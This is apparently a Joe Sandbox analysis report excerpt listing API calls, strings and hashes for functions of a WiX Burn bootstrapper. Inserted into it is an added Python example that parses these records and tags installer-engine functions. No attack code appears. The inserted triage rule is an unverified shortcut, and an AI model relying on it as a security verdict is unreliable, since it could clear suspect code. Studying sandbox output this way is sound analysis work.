                                                                                                                                                              • Opcode Fuzzy Hash: 70501ddc6c9280189aa8fe2e97b66ae8274ab0ffcc81605f7339b0d03de95406
                                                                                                                                                              • Instruction Fuzzy Hash: D731063BA41135BBEB209B989C49F9EBE68FF05761F114221FE05B7242D7719C00CAE0
                                                                                                                                                              APIs
                                                                                                                                                                • Part of subcall function 00A13AA6: RegCloseKey.ADVAPI32(00000000,SOFTWARE\Policies\Microsoft\Windows\Installer,00020019,00000001,feclient.dll,?,?,?,00A13FB5,feclient.dll,?,00000000,?,?,?,00A04B12), ref: 00A13B42
                                                                                                                                                              • Sleep.KERNEL32(000007D0,00000001,feclient.dll,?,00000000,?,?,?,00A04B12,?,?,00A4B488,?,00000001,00000000,00000000), ref: 00A1404C
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseSleep
                                                                                                                                                              • String ID: Failed to copy full log path to prefix.$Failed to copy log extension to extension.$Failed to copy log path to prefix.$Failed to get current directory.$Failed to get non-session specific TEMP folder.$Failed to open log: %ls$Setup$clbcatq.dll$crypt32.dll$feclient.dll$log$msasn1.dll
                                                                                                                                                              • API String ID: 2834455192-2673269691
                                                                                                                                                              • Opcode ID: 4890fe0ff66f0effb60c06ca978a1be7e1d332683f834d16176ba7f7ad647bc8
                                                                                                                                                              • Instruction ID: 3239cb3a4e5f9bf0fdcde0360551c18a3973701d7f8c32506970bd335915e4d0
                                                                                                                                                              • Opcode Fuzzy Hash: 4890fe0ff66f0effb60c06ca978a1be7e1d332683f834d16176ba7f7ad647bc8
                                                                                                                                                              • Instruction Fuzzy Hash: 1D61C171A00615BBDF229F28CD46FAA7BB8EF18380B144265FE01DB180E771EED09790
                                                                                                                                                              APIs
                                                                                                                                                              • EnterCriticalSection.KERNEL32(00000001,?,00000000,00A05445,00000006,?,00A082B9,?,?,?,00000000,00000000,00000001), ref: 00A06DC8
                                                                                                                                                                • Part of subcall function 00A056A9: CompareStringW.KERNEL32(0000007F,00001000,?,000000FF,version.dll,000000FF,?,?,00000000,00A06595,00A06595,?,00A0563D,?,?,00000000), ref: 00A056E5
                                                                                                                                                                • Part of subcall function 00A056A9: GetLastError.KERNEL32(?,00A0563D,?,?,00000000,?,?,00A06595,?,00A07F02,?,?,?,?,?), ref: 00A05714
                                                                                                                                                              • LeaveCriticalSection.KERNEL32(00000001,?,00000000,00000001,00000000,00000000,?,00A082B9), ref: 00A06F59
                                                                                                                                                              Strings
                                                                                                                                                              • variable.cpp, xrefs: 00A06E4B
                                                                                                                                                              • Setting variable failed: ID '%ls', HRESULT 0x%x, xrefs: 00A06F6B
                                                                                                                                                              • Unsetting variable '%ls', xrefs: 00A06F15
                                                                                                                                                              • Setting hidden variable '%ls', xrefs: 00A06E86
                                                                                                                                                              • Failed to find variable value '%ls'., xrefs: 00A06DE3
                                                                                                                                                              • Setting version variable '%ls' to value '%hu.%hu.%hu.%hu', xrefs: 00A06ED0
                                                                                                                                                              • Failed to insert variable '%ls'., xrefs: 00A06E0D
                                                                                                                                                              • Setting string variable '%ls' to value '%ls', xrefs: 00A06EED
                                                                                                                                                              • Failed to set value of variable: %ls, xrefs: 00A06F41
                                                                                                                                                              • Attempt to set built-in variable value: %ls, xrefs: 00A06E56
                                                                                                                                                              • Setting numeric variable '%ls' to value %lld, xrefs: 00A06EFA
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                               • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                               • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                               • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                               • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CriticalSection$CompareEnterErrorLastLeaveString
                                                                                                                                                              • String ID: Attempt to set built-in variable value: %ls$Failed to find variable value '%ls'.$Failed to insert variable '%ls'.$Failed to set value of variable: %ls$Setting hidden variable '%ls'$Setting numeric variable '%ls' to value %lld$Setting string variable '%ls' to value '%ls'$Setting variable failed: ID '%ls', HRESULT 0x%x$Setting version variable '%ls' to value '%hu.%hu.%hu.%hu'$Unsetting variable '%ls'$variable.cpp
                                                                                                                                                              • API String ID: 2716280545-445000439
                                                                                                                                                              • Opcode ID: 189cdb22021aebc13841788bdd11ba93d0a285cdfa91f99fc15920504831078a
                                                                                                                                                              • Instruction ID: 4f73736faf8adff4a5813bdebee24383451ce9edc2c2da04158334afdabeb7ee
                                                                                                                                                              • Opcode Fuzzy Hash: 189cdb22021aebc13841788bdd11ba93d0a285cdfa91f99fc15920504831078a
                                                                                                                                                              • Instruction Fuzzy Hash: 53510975A4022EFBDB309F29ED4AF6B7BB8EB95718F100519F804562C2C271DC61DAE1
                                                                                                                                                              APIs
                                                                                                                                                              • IsWindow.USER32(?), ref: 00A04C64
                                                                                                                                                              • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00A04C75
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to create the message window., xrefs: 00A04B98
                                                                                                                                                              • Failed to set registration variables., xrefs: 00A04BDE
                                                                                                                                                              • Failed to check global conditions, xrefs: 00A04B49
                                                                                                                                                              • WixBundleLayoutDirectory, xrefs: 00A04BF5
                                                                                                                                                              • Failed while running , xrefs: 00A04C2A
                                                                                                                                                              • Failed to set layout directory variable to value provided from command-line., xrefs: 00A04C06
                                                                                                                                                              • Failed to set action variables., xrefs: 00A04BC4
                                                                                                                                                              • Failed to query registration., xrefs: 00A04BAE
                                                                                                                                                              • Failed to open log., xrefs: 00A04B18
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                               • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                               • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                               • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                               • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: MessagePostWindow
                                                                                                                                                              • String ID: Failed to check global conditions$Failed to create the message window.$Failed to open log.$Failed to query registration.$Failed to set action variables.$Failed to set layout directory variable to value provided from command-line.$Failed to set registration variables.$Failed while running $WixBundleLayoutDirectory
                                                                                                                                                              • API String ID: 3618638489-3051724725
                                                                                                                                                              • Opcode ID: beccecda177b6dea44c61093efa9cea9ada1b68651dc1016bb45db531fed9719
                                                                                                                                                              • Instruction ID: b4ef906f2b7dcc09493aacf8d40822122ade6f2372d5d2034f26aa588f75096f
                                                                                                                                                              • Opcode Fuzzy Hash: beccecda177b6dea44c61093efa9cea9ada1b68651dc1016bb45db531fed9719
                                                                                                                                                              • Instruction Fuzzy Hash: B74107B1A0161EBBDB265B74EE45FBAB66CFF09750F000615FA04961D0DBB0EC5097E0
                                                                                                                                                              APIs
                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00000000,?,?,00A0548E,?,?), ref: 00A1EA9D
                                                                                                                                                              • GetLastError.KERNEL32(?,00A0548E,?,?), ref: 00A1EAAA
                                                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_0001E7B4,?,00000000,00000000), ref: 00A1EB03
                                                                                                                                                              • GetLastError.KERNEL32(?,00A0548E,?,?), ref: 00A1EB10
                                                                                                                                                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,00A0548E,?,?), ref: 00A1EB4B
                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00A0548E,?,?), ref: 00A1EB6A
                                                                                                                                                              • CloseHandle.KERNELBASE(?,?,00A0548E,?,?), ref: 00A1EB77
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                               • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                               • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                               • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                               • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseCreateErrorHandleLast$EventMultipleObjectsThreadWait
                                                                                                                                                              • String ID: Failed to create initialization event.$Failed to create the UI thread.$uithread.cpp
                                                                                                                                                              • API String ID: 2351989216-3599963359
                                                                                                                                                              • Opcode ID: 4f2324c5dadc7100ea71168341e6d759d421fd9be40da2e1154732cd14ae6bc7
                                                                                                                                                              • Instruction ID: 3d8d6362ee1fefb0feb57c6406646dd73739f6d26f370a01b5cbc4456538307e
                                                                                                                                                              • Opcode Fuzzy Hash: 4f2324c5dadc7100ea71168341e6d759d421fd9be40da2e1154732cd14ae6bc7
                                                                                                                                                              • Instruction Fuzzy Hash: 77318D7AE01229BBDB10DFE99D85ADFBABCBF04751F114165BD05F7280E6709E408AA0
                                                                                                                                                              APIs
                                                                                                                                                              • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,74DF2F60,?,?,00A05405,00A053BD,00000000,00A05445), ref: 00A21506
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00A21519
                                                                                                                                                              • GetExitCodeThread.KERNELBASE(00A4B488,?), ref: 00A2155B
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00A21569
                                                                                                                                                              • ResetEvent.KERNEL32(00A4B460), ref: 00A215A4
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00A215AE
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                               • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                               • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                               • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                               • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$CodeEventExitMultipleObjectsResetThreadWait
                                                                                                                                                              • String ID: Failed to get extraction thread exit code.$Failed to reset operation complete event.$Failed to wait for operation complete event.$cabextract.cpp
                                                                                                                                                              • API String ID: 2979751695-3400260300
                                                                                                                                                              • Opcode ID: c97b1dde0b2e59b566aa40414d3b958f46da3f3839e8bcc70fb25242f50b39bc
                                                                                                                                                              • Instruction ID: ecb630a51296e32bd02cfb15db9e6c495b8c7d2c2c870c02946984831c32451a
                                                                                                                                                              • Opcode Fuzzy Hash: c97b1dde0b2e59b566aa40414d3b958f46da3f3839e8bcc70fb25242f50b39bc
                                                                                                                                                              • Instruction Fuzzy Hash: A431C475B00215FBDB10DFAD9D05AAE7AF8FB94301F1085AAF902D61A0E771CA019B61
                                                                                                                                                              APIs
                                                                                                                                                              • GetTempPathW.KERNEL32(00000104,?,00000000,00000000,00000000), ref: 00A02E5F
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00A02E69
                                                                                                                                                              • GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00A02F09
                                                                                                                                                              • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000001,00000080,00000000), ref: 00A02F96
                                                                                                                                                              • GetLastError.KERNEL32 ref: 00A02FA3
                                                                                                                                                              • Sleep.KERNEL32(00000064), ref: 00A02FB7
                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 00A0301F
                                                                                                                                                              Strings
                                                                                                                                                              • %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls, xrefs: 00A02F66
                                                                                                                                                              • pathutil.cpp, xrefs: 00A02E8D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                               • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                               • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                               • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                               • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$CloseCreateFileHandleLocalPathSleepTempTime
                                                                                                                                                              • String ID: %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls$pathutil.cpp
                                                                                                                                                              • API String ID: 3480017824-1101990113
                                                                                                                                                              • Opcode ID: 07d26a7303aeb382df1916d2865188cd5f9e72864eebd066b0461717ef0af4dc
                                                                                                                                                              • Instruction ID: fe9a22086079a52971f4d5bb91ea98cc9952827320ed1f8d46611c7fb9486584
                                                                                                                                                              • Opcode Fuzzy Hash: 07d26a7303aeb382df1916d2865188cd5f9e72864eebd066b0461717ef0af4dc
                                                                                                                                                              • Instruction Fuzzy Hash: 9F718576D4122DABDB309FA8ED4DBAAB7B8AB08710F1001E5F904A71D0D7749E81CF60
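Added example, not part of the Joe Sandbox report and not code from the sample or from the WiX Toolset: a small parser for the per-function records above (the "APIs", "Strings" and "Similarity" lists) that does two things an analyst wants when reading this kind of report. First, it names the Win32 constants in the pathutil.cpp block's CreateFileW call (0x40000000, 1, 1, 0x80 are GENERIC_WRITE, FILE_SHARE_READ, CREATE_NEW and FILE_ATTRIBUTE_NORMAL), so the "create a fresh timestamped temp file, sleep and retry" pattern is readable at a glance. Second, it tags functions whose log-site strings name a WiX Burn engine source file (variable.cpp, uithread.cpp, cabextract.cpp, pathutil.cpp, payload.cpp, all of which appear in the records above), so the bootstrapper's own code can be set aside and attention spent on the unattributed functions. The record text embedded below is constructed from the report's pathutil.cpp and cabextract.cpp blocks, trimmed to the lines the parser reads; the record classification labels are this example's own.

```python
"""Parse Joe Sandbox per-function records and triage them (added example)."""
import re
from dataclasses import dataclass, field

# Constructed sample: two records in the shape of the report's pathutil.cpp
# and cabextract.cpp blocks. Note the second record's "Strings" list is
# empty while its "String ID" still carries the strings, as in the report.
SAMPLE = """\
APIs
• GetTempPathW.KERNEL32(00000104,?,00000000,00000000,00000000), ref: 00A02E5F
• GetLastError.KERNEL32 ref: 00A02E69
• CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000001,00000080,00000000), ref: 00A02F96
• Sleep.KERNEL32(00000064), ref: 00A02FB7
• CloseHandle.KERNEL32(?), ref: 00A0301F
Strings
• %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls, xrefs: 00A02F66
• pathutil.cpp, xrefs: 00A02E8D
Similarity
• API ID: ErrorLast$CloseCreateFileHandleLocalPathSleepTempTime
• Instruction Fuzzy Hash: 9F718576D4122DABDB309FA8ED4DBAAB7B8AB08710F1001E5F904A71D0D7749E81CF60
APIs
• WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 00A21506
• GetLastError.KERNEL32 ref: 00A21519
• Part of subcall function 00A056A9: GetLastError.KERNEL32(?,00A0563D), ref: 00A05714
Strings
Similarity
• API ID: ErrorLast$CodeEventExitMultipleObjectsResetThreadWait
• String ID: Failed to get extraction thread exit code.$cabextract.cpp
"""

# "Name.MODULE(args), ref: ADDR"; args and the "Part of subcall" prefix are optional.
API_RE = re.compile(r"^•\s*(?:Part of subcall function [0-9A-F]+:\s*)?"
                    r"(?P<name>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)$")
STRING_RE = re.compile(r"^•\s*(?P<text>.*), xrefs:\s*(?P<ref>[0-9A-F]+)$")
SIM_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+):\s*(?P<val>.*)$")

# Source-file names logged by the WiX Burn engine, as seen in the report's strings.
BURN_SOURCE_FILES = {"variable.cpp", "uithread.cpp", "cabextract.cpp", "pathutil.cpp", "payload.cpp"}


@dataclass
class ApiCall:
    name: str
    module: str
    args: list   # hex strings as printed; "?" where the sandbox could not resolve a value
    ref: str


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)
    strings: list = field(default_factory=list)
    similarity: dict = field(default_factory=dict)

    def all_strings(self):
        """Strings from the list plus the '$'-joined 'String ID', which survives when the list is empty."""
        found = set(self.strings)
        found.update(s for s in self.similarity.get("String ID", "").split("$") if s)
        return found


def parse_records(text):
    """Split report text into records; a new record starts at each 'APIs' header."""
    records, section, current = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            current = FunctionRecord()
            records.append(current)
            section = "apis"
        elif line in ("Strings", "Similarity", "Memory Dump Source", "Joe Sandbox IDA Plugin"):
            section = line.lower()
        elif current is None or not line.startswith("•"):
            continue
        elif section == "apis" and (m := API_RE.match(line)):
            args = [a.strip() for a in (m["args"] or "").split(",") if a.strip()]
            current.apis.append(ApiCall(m["name"], m["module"], args, m["ref"]))
        elif section == "strings" and (m := STRING_RE.match(line)):
            current.strings.append(m["text"])
        elif section == "similarity" and (m := SIM_RE.match(line)):
            current.similarity[m["key"]] = m["val"]
    return records


# Standard Win32 constants for the CreateFileW parameters decoded below.
GENERIC = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE", 0x20000000: "GENERIC_EXECUTE"}
SHARE = {0x1: "FILE_SHARE_READ", 0x2: "FILE_SHARE_WRITE", 0x4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
ATTRS = {0x80: "FILE_ATTRIBUTE_NORMAL", 0x100: "FILE_ATTRIBUTE_TEMPORARY", 0x04000000: "FILE_FLAG_DELETE_ON_CLOSE"}


def _flags(value, table):
    names = [n for bit, n in table.items() if value & bit]
    return names or [hex(value)]   # 0x0 share mode means exclusive access


def decode_createfile(call):
    """Name the constants of a CreateFileW(lpName, access, share, sa, disposition, attrs, template) call."""
    if call.name != "CreateFileW" or len(call.args) < 6:
        return None
    vals = [None if a == "?" else int(a, 16) for a in call.args[:6]]
    access, share, disp, attrs = vals[1], vals[2], vals[4], vals[5]
    return {
        "access": _flags(access, GENERIC) if access is not None else ["?"],
        "share": _flags(share, SHARE) if share is not None else ["?"],
        "disposition": DISPOSITION.get(disp, hex(disp)) if disp is not None else "?",
        "attributes": _flags(attrs, ATTRS) if attrs is not None else ["?"],
    }


def classify(rec):
    """'burn-engine' when a WiX Burn source-file name is among the strings, else 'unattributed'."""
    return "burn-engine" if rec.all_strings() & BURN_SOURCE_FILES else "unattributed"


if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        print(classify(rec), [c.name for c in rec.apis])
        for call in rec.apis:
            if (d := decode_createfile(call)):
                print("  CreateFileW:", d)
```

The empty-"Strings"-but-populated-"String ID" case matters: the uithread.cpp and cabextract.cpp records above show it, and a triage script keyed only on the "Strings" list would leave those functions unattributed. The fuzzy hashes and Opcode IDs are kept in `similarity` untouched, so the same records can be fed to whatever similarity lookup the analyst uses.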
                                                                                                                                                              APIs
                                                                                                                                                              • CompareStringW.KERNEL32(0000007F,00000000,FFFEB88D,000000FF,00000001,000000FF,?,00000001,00A053BD,00000000,00A05489,00A05445,WixBundleUILevel,840F01E8,?,00000001), ref: 00A0CC1C
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to extract file., xrefs: 00A0CCE7
                                                                                                                                                              • payload.cpp, xrefs: 00A0CD1D
                                                                                                                                                              • Failed to find embedded payload: %ls, xrefs: 00A0CC48
                                                                                                                                                              • Failed to ensure directory exists, xrefs: 00A0CCEE
                                                                                                                                                              • Payload was not found in container: %ls, xrefs: 00A0CD29
                                                                                                                                                              • Failed to concat file paths., xrefs: 00A0CCFC
                                                                                                                                                              • Failed to get next stream., xrefs: 00A0CD03
                                                                                                                                                              • Failed to get directory portion of local file path, xrefs: 00A0CCF5
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CompareString
                                                                                                                                                              • String ID: Failed to concat file paths.$Failed to ensure directory exists$Failed to extract file.$Failed to find embedded payload: %ls$Failed to get directory portion of local file path$Failed to get next stream.$Payload was not found in container: %ls$payload.cpp
                                                                                                                                                              • API String ID: 1825529933-1711239286
                                                                                                                                                              • Opcode ID: 500b2219522b10636aa948358ee58b85e05f392d82f09101b6b23ef78b18859b
                                                                                                                                                              • Instruction ID: da79e7e1b03179a48821e8d1b1da32858e11d38a7d311fd667caaae290a98af8
                                                                                                                                                              • Opcode Fuzzy Hash: 500b2219522b10636aa948358ee58b85e05f392d82f09101b6b23ef78b18859b
                                                                                                                                                              • Instruction Fuzzy Hash: 5041CE35D0021DFFCF259F98ED81AAEBBB5BF40721B118269E905AB2E1D7709D40DB90
                                                                                                                                                              APIs
                                                                                                                                                              • PeekMessageW.USER32(00000000,00000000,00000400,00000400,00000000), ref: 00A047BB
                                                                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00A047C1
                                                                                                                                                              • GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00A0484F
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to create engine for UX., xrefs: 00A047DB
                                                                                                                                                              • Failed to start bootstrapper application., xrefs: 00A0481D
                                                                                                                                                              • engine.cpp, xrefs: 00A0489B
                                                                                                                                                              • Unexpected return value from message pump., xrefs: 00A048A5
                                                                                                                                                              • wininet.dll, xrefs: 00A047EE
                                                                                                                                                              • Failed to load UX., xrefs: 00A04804
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Message$CurrentPeekThread
                                                                                                                                                              • String ID: Failed to create engine for UX.$Failed to load UX.$Failed to start bootstrapper application.$Unexpected return value from message pump.$engine.cpp$wininet.dll
                                                                                                                                                              • API String ID: 673430819-2573580774
                                                                                                                                                              • Opcode ID: 01c7c8548b17579040eafb3f7595539f27f701783401147567da9015e03abfae
                                                                                                                                                              • Instruction ID: 6693c247fae9c39e41116a898d3e4cc1d98707fa4950c0760aee8f5949b9d0d7
                                                                                                                                                              • Opcode Fuzzy Hash: 01c7c8548b17579040eafb3f7595539f27f701783401147567da9015e03abfae
                                                                                                                                                              • Instruction Fuzzy Hash: 984193B6A00559BFDB109BA4EC85EBA77ACFF48314F104525FA04E71D0DB31ED4987A0
                                                                                                                                                              APIs
                                                                                                                                                              • LoadLibraryExW.KERNEL32(?,00000000,00000008,00000000,?,00A047FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00A0548E,?), ref: 00A0D6DA
                                                                                                                                                              • GetLastError.KERNEL32(?,00A047FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00A0548E,?,?), ref: 00A0D6E7
                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,BootstrapperApplicationCreate), ref: 00A0D71F
                                                                                                                                                              • GetLastError.KERNEL32(?,00A047FE,00000000,00000000,wininet.dll,?,00000000,00000000,?,?,00A0548E,?,?), ref: 00A0D72B
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684458184.0000000000A4B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684483765.0000000000A6A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              • Associated: 00000001.00000002.1684498323.0000000000A6D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_1_2_a00000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$AddressLibraryLoadProc
                                                                                                                                                              • String ID: BootstrapperApplicationCreate$Failed to create UX.$Failed to get BootstrapperApplicationCreate entry-point$Failed to load UX DLL.$userexperience.cpp
                                                                                                                                                              • API String ID: 1866314245-2276003667
                                                                                                                                                              • Opcode ID: 71430033058b236bbd746dedc5a562d83a10ee54e4eda500fdf24d3f4fc834a4
                                                                                                                                                              • Instruction ID: 389a7cf4008d2ababf74dac1dcd816815b385dbefc346ac83f35e70de3f4f2ab
                                                                                                                                                              • Opcode Fuzzy Hash: 71430033058b236bbd746dedc5a562d83a10ee54e4eda500fdf24d3f4fc834a4
                                                                                                                                                              • Instruction Fuzzy Hash: E211C83FA80736BBCB3197D8AC05F5B6A947B45761F014925BE10EB1C0D761DC0086E0
                                                                                                                                                              APIs
                                                                                                                                                              • RegCloseKey.ADVAPI32(?,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 00A0F942
                                                                                                                                                              • RegCloseKey.ADVAPI32(00000000,?,?,00000001,?,?,?,00000001,00000000,?,00000000,?,?,?,00000000,?), ref: 00A0F94F
                                                                                                                                                              Strings
                                                                                                                                                              • Resume, xrefs: 00A0F8B6
                                                                                                                                                              • Failed to format pending restart registry key to read., xrefs: 00A0F846
                                                                                                                                                              • %ls.RebootRequired, xrefs: 00A0F82F
                                                                                                                                                              • Failed to open registration key., xrefs: 00A0F8AB
                                                                                                                                                              • Failed to read Resume value., xrefs: 00A0F8D8
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000001.00000002.1684422953.0000000000A01000.00000020.00000001.01000000.00000005.sdmp, Offset: 00A00000, based on PE: true
                                                                                                                                                              • Associated: 00000001.00000002.1684408129.0000000000A00000.00000002.00000001.01000000.00000005.sdmpDownload File
